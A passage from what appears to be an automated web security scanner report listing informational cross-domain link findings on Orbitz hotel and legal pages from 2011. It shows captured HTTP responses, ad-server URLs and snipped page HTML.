http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2/2/11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON,_MA,_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif
http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css
http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101
https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B2008471E286BF0352AC254A6CAAB529; Path=/
Set-Cookie: AustinLocale=en_US; Expires=Mon, 20-Feb-2079 19:26:02 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:11:55 GMT
Content-Length: 112339

...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad searchFormAd"><a href="http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png" alt="Call us to book 1-800-649-9920" height="54" width="364" />
    </div>
...[SNIP]...
<div class="ad adBelowSearchForm"><a href="http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>


            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<div class="ad americanExpress"><a href="http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...

<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad clear"><a href="http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663115441&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&hotelCheckOutDate=2%2F2%2F11&origin=&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&dest=BOSTON%2C_MA%2C_UNITED_STATES&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<noscript> <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.366. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/pagedef/content/legal/bestPriceGuarantee.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp?popupsDisabled=false

The response contains the following link to another domain:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=20BF51DAC8FDA4EE977AD70538F94CA9; Path=/
Content-Type: text/html
Date: Thu, 03 Feb 2011 06:46:52 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 8903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- IA Page ID: TODO
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

17.367. http://www.orbitz.com/shared/adserverProxy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
